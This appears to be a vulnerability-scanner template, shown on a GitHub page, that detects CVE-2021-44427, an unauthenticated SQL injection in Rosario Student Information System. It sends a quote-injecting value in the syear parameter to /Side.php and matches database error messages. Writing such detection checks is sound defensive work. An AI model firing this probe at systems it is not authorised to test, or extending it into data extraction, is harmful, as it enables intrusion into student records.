-
Notifications
You must be signed in to change notification settings - Fork 220
/
Copy pathCVE-2021-44427.yaml
38 lines (33 loc) · 1.16 KB
/
CVE-2021-44427.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
id: CVE-2021-44427
info:
name: Rosario Student Information System Unauthenticated SQL Injection
author: furkansayim,xShuden
severity: critical
description: An unauthenticated SQL Injection vulnerability in Rosario Student Information System (aka rosariosis) before 8.1.1 allows remote attackers to execute PostgreSQL statements (e.g., SELECT, INSERT, UPDATE, and DELETE) through /Side.php via the syear parameter.
reference:
- https://gitlab.com/francoisjacquet/rosariosis/-/issues/328
- https://twitter.com/RemotelyAlerts/status/1465697928178122775
- https://nvd.nist.gov/vuln/detail/CVE-2021-44427
tags: cve,cve2021,sqli,rosariosis
requests:
- method: POST
path:
- "{{BaseURL}}/Side.php"
body: "sidefunc=update&syear=111'"
headers:
Content-Type: application/x-www-form-urlencoded; charset=utf-8
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DB Execute Failed. ERROR:"
- "unterminated quoted string"
condition: and
- type: status
status:
- 200
- type: word
part: header
words:
- "RosarioSIS="